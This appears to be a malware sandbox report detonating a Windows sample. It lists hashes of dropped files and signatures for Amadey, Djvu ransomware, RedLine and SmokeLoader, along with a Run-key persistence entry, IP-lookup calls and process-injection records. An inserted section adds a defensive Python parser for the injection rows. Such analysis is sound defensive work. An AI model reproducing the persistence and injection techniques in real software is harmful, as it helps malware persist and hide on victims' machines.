MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\2477.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

memory/1332-371-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1708-378-0x0000000000860000-0x0000000000904000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FC58.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

C:\Users\Admin\AppData\Local\Temp\FC58.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

C:\Users\Admin\AppData\Local\Temp\FC58.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

memory/1552-383-0x0000000000400000-0x00000000022F7000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e3b798bf36b7c8e0a067b765aead6948
SHA1 8babfb0e3e36ba6bb9dae50a0be22ae963f7de92
SHA256 781a29b37636212d3b44d4736080e3090b2688edb407038ce7b8d24e05599aa0
SHA512 b94215167f98c2ef24f5cb8a5db3f9ebb1cc8fc663f5950abe7b6696f1fd2ca847ece0172e64a0df51c12ce5047fff7a1fcd3b07ae2a23ed48d61ed85fba429d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 802b7992b634b8cb8eae916015536e1b
SHA1 ddbf0933cf5e0051a3feaf6aa82de9008de71801
SHA256 16eded867e96946d4ed35ea0561457893a61ef11da70c3afb1570bd47e86bde3
SHA512 14f2fda7c57a8345bfcdc59692394b6c72b2d2a8c860f0f67c44cefbcdbff1e0a39a954fe7ab8b323302549a9ecf6ae7e15ef517a7eec933a56a704277a9828d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 b5e1eba37e2e37707aab6a11ca082df4
SHA1 9b0e94ab1859e6b0169ffeface2d3309698db792
SHA256 5ecef02ec9b051df9d25917e8f3e0abfb5b4f713b8b4855fea3ce3de239c8212
SHA512 e0962361d8ff8cc22934005823db2671da74a73b2732ae7c9f25ef058593c3896a2c7e1e51c05d6cc62d7e5f71d2a7ad90af035dbcf60dff26808bbaabac1294

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 cde3004d458a86374c76b63425fc9b8c
SHA1 91ed2720991b113dc6ee6b5705ec24b270e081df
SHA256 3851e2bff744375020167c2341984024cb6ee0e3d120685ad3e984125bb11447
SHA512 9ee9bd7550fb17ae13920ffd7a803727a35d823132f0fbe216d8bbbb09959cc673221d58e1f1b81909a634effedfb74ef29b3e0278a37590d2550db9b6d5cb5f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 dacb8576b9b657c42ff5f78664c9caeb
SHA1 fc2d7fd412ed3184173f36171bafeb4121561011
SHA256 575ce234210873c6403ae016a90cd08c35ff921499e2892dffe9f5692deeccb3
SHA512 f1f8c21cd050420ac21d5ac5f292ac6f14191e6498064b19e717eeb7d7a887fda9e4897f17c239771065795911afe8cce4811fae12bdcec131ed6cf6fde643e8

\Users\Admin\AppData\Local\Temp\FC58.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

memory/1708-406-0x0000000073CB0000-0x000000007439E000-memory.dmp

C:\Users\Admin\AppData\Local\373c239a-1b4b-4cd5-96cf-9ad79c86026b\E80E.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

memory/2444-415-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1996-418-0x0000000000400000-0x00000000026DA000-memory.dmp

memory/1732-421-0x0000000000400000-0x0000000002075000-memory.dmp

memory/1732-423-0x0000000073CB0000-0x000000007439E000-memory.dmp

memory/476-443-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2452-448-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

memory/2452-449-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/1332-453-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2452-454-0x000007FEF4F10000-0x000007FEF58AD000-memory.dmp

memory/2452-455-0x0000000002354000-0x0000000002357000-memory.dmp

memory/2452-456-0x000000000235B000-0x00000000023C2000-memory.dmp

memory/2776-463-0x0000000073CB0000-0x000000007439E000-memory.dmp

memory/812-469-0x000000001B150000-0x000000001B432000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IETIC4C9Y1V4RBDAF1CE.temp

MD5 f0a96ba9844b1d13eb23b639b9f7f7ef
SHA1 227d4b2f36a85106863edfbaa5abf3ecbe373acf
SHA256 07348b43dfa7e242bac92046655e4f8fd42f9e41ca58de831ad57fa9010ab0a5
SHA512 2a896e4fbaf528610244c49068f3a9259fe4de167aa6c60da3a76d59b499eaf91e02808fc056adf0b9c51ca32b118bbb6d21154d1d672415ca6c70150c083615

memory/812-470-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

memory/580-471-0x0000000002170000-0x00000000021A4000-memory.dmp

memory/812-487-0x000007FEF4570000-0x000007FEF4F0D000-memory.dmp

memory/812-488-0x00000000026B4000-0x00000000026B7000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build2.exe

MD5 304dcbfad357a684b36d2d639cdbc3eb
SHA1 428c58d8c86c49e28bc9958608817bf6a97dd780
SHA256 bd5aff6936d77e3deae4e45195b44ec5d4e7ba4f2a9dfe68ee7d6f7be2cfd97a
SHA512 8dd618a8a22c3e7f0f19287c6ca8135959f34f30a5d2e19f10f71c45a6b7c8c7dc0900b3e23c3ae479455cd1ce94a744c0841c26bde28f28ef8552130d465d43

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\73836916308175099145430277

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-07 11:48

Reported

2023-08-07 11:58

Platform

win10-20230703-en

Max time kernel

600s

Max time network

545s

Command Line

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A (6 matches recorded, none with a description, indicator, process or target)

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\fjuisiv N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B30D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B8EA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F2A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\70d15f63-82c7-494f-84ba-94633b2cacef\\56A.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\56A.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A (15 lookups of api.2ip.ua recorded)

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3500 set thread context of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 1872 set thread context of 1200 N/A C:\Users\Admin\AppData\Local\Temp\5351.exe C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 1216 set thread context of 1988 N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe C:\Users\Admin\AppData\Local\Temp\66BD.exe
PID 528 set thread context of 4080 N/A C:\Users\Admin\AppData\Local\Temp\741C.exe C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 4252 set thread context of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe C:\Users\Admin\AppData\Local\Temp\7BED.exe
PID 3540 set thread context of 5100 N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe C:\Users\Admin\AppData\Local\Temp\A6B8.exe
PID 1856 set thread context of 1884 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 4528 set thread context of 1060 N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe C:\Users\Admin\AppData\Local\Temp\DD5B.exe
PID 3160 set thread context of 2824 N/A C:\Users\Admin\AppData\Local\Temp\5351.exe C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 4548 set thread context of 4196 N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe
PID 728 set thread context of 3584 N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe C:\Users\Admin\AppData\Local\Temp\66BD.exe
PID 712 set thread context of 900 N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe C:\Users\Admin\AppData\Local\Temp\7BED.exe
PID 2644 set thread context of 2564 N/A C:\Users\Admin\AppData\Local\Temp\741C.exe C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 3124 set thread context of 1640 N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe C:\Users\Admin\AppData\Local\Temp\A6B8.exe
PID 1348 set thread context of 4672 N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe C:\Users\Admin\AppData\Local\Temp\DD5B.exe
PID 1396 set thread context of 344 N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe
PID 1332 set thread context of 544 N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe
PID 1216 set thread context of 4520 N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 4692 set thread context of 4288 N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe
PID 2972 set thread context of 3168 N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe
PID 2196 set thread context of 3576 N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe
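Added example, not part of the sandbox report: a small parser for the SetThreadContext rows above that separates same-image from cross-image context writes and cross-checks them against the WriteProcessMemory rows further down. A parent that starts a copy of its own image, writes into it and then redirects its thread is the usual hollowing (RunPE) sequence; the "self-hollowing" and "cross-image" labels, and the corroboration rule, are this example's own interpretation rather than a verdict the report makes. The sample rows are copied from the two tables of this detonation.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Rows copied from the "Suspicious use of SetThreadContext" and
# "Suspicious use of WriteProcessMemory" tables of this detonation.
THREAD_CONTEXT_ROWS = [
    r"PID 3500 set thread context of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe",
    r"PID 1216 set thread context of 1988 N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe C:\Users\Admin\AppData\Local\Temp\66BD.exe",
    r"PID 1216 set thread context of 4520 N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe",
    r"PID 4528 set thread context of 1060 N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe C:\Users\Admin\AppData\Local\Temp\DD5B.exe",
]
WRITE_MEMORY_ROWS = [
    r"PID 3344 wrote to memory of 3500 N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe",
    r"PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe",
]

CONTEXT_RE = re.compile(r"^PID (\d+) set thread context of (\d+) N/A (\S+) (\S+)$")
WRITE_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) ")


@dataclass(frozen=True)
class ContextWrite:
    src_pid: int
    dst_pid: int
    src_image: str
    dst_image: str

    @property
    def kind(self) -> str:
        # Same image on both ends: the parent started a copy of itself and redirected
        # its thread, the shape of process hollowing / RunPE. Different images: the
        # context write crosses into another binary. Labels are this example's own.
        return "self-hollowing" if self.src_image.lower() == self.dst_image.lower() else "cross-image"


def parse_context_rows(rows):
    """Turn the report's SetThreadContext rows into ContextWrite events; rows with N/A images are skipped."""
    events = []
    for row in rows:
        m = CONTEXT_RE.match(row.strip())
        if m:
            events.append(ContextWrite(int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)))
    return events


def parse_write_pairs(rows):
    """(writer pid, target pid) pairs; the report repeats one row per write call, so collect a set."""
    pairs = set()
    for row in rows:
        m = WRITE_RE.match(row.strip())
        if m:
            pairs.add((int(m.group(1)), int(m.group(2))))
    return pairs


def corroborated(events, write_pairs):
    """Context writes whose (src, dst) pair also received WriteProcessMemory from the same parent:
    memory writes into a child followed by a thread redirect is the full hollowing sequence."""
    return [e for e in events if (e.src_pid, e.dst_pid) in write_pairs]


def summarize(events):
    """Count events per kind and list parents that redirected more than one child."""
    injectors = Counter(e.src_pid for e in events)
    return {
        "by_kind": dict(Counter(e.kind for e in events)),
        "repeat_injectors": sorted(pid for pid, n in injectors.items() if n > 1),
    }


if __name__ == "__main__":
    evts = parse_context_rows(THREAD_CONTEXT_ROWS)
    print(summarize(evts))
    for e in corroborated(evts, parse_write_pairs(WRITE_MEMORY_ROWS)):
        print(f"{e.src_pid} -> {e.dst_pid} ({e.kind}) backed by WriteProcessMemory")
```

On the four sample rows this reports three self-image redirects and one cross-image one (build2.exe into 66BD.exe), PID 1216 as the only parent that redirected two children, and the 3500 -> 2532 pair as the one also backed by a WriteProcessMemory row in the sample. Feeding the complete tables of this detonation into the same functions gives the full picture.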

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A N/A N/A (62 further matches recorded with no process attributed)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6053.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3344 wrote to memory of 3500 N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 3500 N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 3500 N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 948 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3344 wrote to memory of 948 N/A N/A C:\Windows\system32\regsvr32.exe
PID 948 wrote to memory of 3808 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 948 wrote to memory of 3808 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 948 wrote to memory of 3808 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3344 wrote to memory of 1280 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3344 wrote to memory of 1280 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1280 wrote to memory of 3916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1280 wrote to memory of 3916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1280 wrote to memory of 3916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3344 wrote to memory of 1336 N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe
PID 3344 wrote to memory of 1336 N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe
